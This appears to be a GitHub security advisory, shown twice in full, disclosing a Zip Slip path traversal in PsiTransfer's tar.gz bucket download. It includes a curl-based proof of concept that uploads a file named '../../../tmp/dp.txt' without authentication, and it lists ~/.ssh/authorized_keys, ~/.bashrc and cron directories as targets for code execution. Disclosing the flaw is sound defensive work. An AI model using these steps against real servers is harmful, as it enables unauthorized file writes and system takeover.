Headline
GHSA-xphh-5v4r-r3rx: PsiTransfer has Zip Slip Path Traversal via TAR Archive Download
Summary
A Zip Slip vulnerability in PsiTransfer allows an unauthenticated attacker to upload files with path traversal sequences in the filename (e.g. ../../../.ssh/authorized_keys). When a victim downloads the bucket as a .tar.gz archive and extracts it, malicious files are written outside the intended directory, potentially leading to RCE.
Details
The vulnerability exists in the archive download functionality in lib/endpoints.js where user controlled metadata.name is used directly without sanitization when creating TAR archive entries.
lib/endpoints.js:275
const entry = pack.entry({ name: info.metadata.name, size: info.size });
lib/endpoints.js:372
assert(meta.name, 'tus meta prop missing: name');
PoC
I. Upload file with malicious filename (no authentication required).
MALICIOUS_NAME=$(echo -n "../../../tmp/dp.txt" | base64)
SID=$(echo -n "evil" | base64)
RETENTION=$(echo -n "3600" | base64)
curl -X POST http://TARGET:3000/files \
-H "Tus-Resumable: 1.0.0" \
-H "Upload-Length: 15" \
-H "Upload-Metadata: name ${MALICIOUS_NAME},sid ${SID},retention ${RETENTION}"
II. Complete upload with PATCH
curl -X PATCH "http://TARGET:3000/files/evil++<UUID>" \
-H "Tus-Resumable: 1.0.0" \
-H "Upload-Offset: 0" \
-H "Content-Type: application/offset+octet-stream" \
-d "MALICIOUS_CONTENT"
III. Victim downloads and extracts TAR
curl "http://TARGET:3000/files/evil++<HASH>.tar.gz" -o files.tar.gz
tar -tzf files.tar.gz
Impact
Arbitrary File Write: Attacker can write files anywhere on victim’s filesystem when they extract the archive. RCE: By targeting ~/.bashrc, ~/.ssh/authorized_keys, cron directories etc… No Authentication Required: Default configuration has uploadPass: false. Social Engineering Vector: Attacker sends malicious download link to victim.
Summary
A Zip Slip vulnerability in PsiTransfer allows an unauthenticated attacker to upload files with path traversal sequences in the filename (e.g. …/…/…/.ssh/authorized_keys). When a victim downloads the bucket as a .tar.gz archive and extracts it, malicious files are written outside the intended directory, potentially leading to RCE.
Details
The vulnerability exists in the archive download functionality in lib/endpoints.js where user controlled metadata.name is used directly without sanitization when creating TAR archive entries.
lib/endpoints.js:275
const entry = pack.entry({ name: info.metadata.name, size: info.size });
lib/endpoints.js:372
assert(meta.name, 'tus meta prop missing: name');
PoC
I. Upload file with malicious filename (no authentication required).
MALICIOUS_NAME=$(echo -n "../../../tmp/dp.txt" | base64)
SID=$(echo -n "evil" | base64)
RETENTION=$(echo -n "3600" | base64)
curl -X POST http://TARGET:3000/files \
-H "Tus-Resumable: 1.0.0" \
-H "Upload-Length: 15" \
-H "Upload-Metadata: name ${MALICIOUS_NAME},sid ${SID},retention ${RETENTION}"
II. Complete upload with PATCH
curl -X PATCH "http://TARGET:3000/files/evil++<UUID>" \
-H "Tus-Resumable: 1.0.0" \
-H "Upload-Offset: 0" \
-H "Content-Type: application/offset+octet-stream" \
-d "MALICIOUS_CONTENT"
III. Victim downloads and extracts TAR
curl "http://TARGET:3000/files/evil++<HASH>.tar.gz" -o files.tar.gz
tar -tzf files.tar.gz
Impact
Arbitrary File Write: Attacker can write files anywhere on victim’s filesystem when they extract the archive.
RCE: By targeting ~/.bashrc, ~/.ssh/authorized_keys, cron directories etc…
No Authentication Required: Default configuration has uploadPass: false.
Social Engineering Vector: Attacker sends malicious download link to victim.
References
- GHSA-xphh-5v4r-r3rx
- psi-4ward/psitransfer@6c71bc0
- https://github.com/psi-4ward/psitransfer/releases/tag/v2.3.1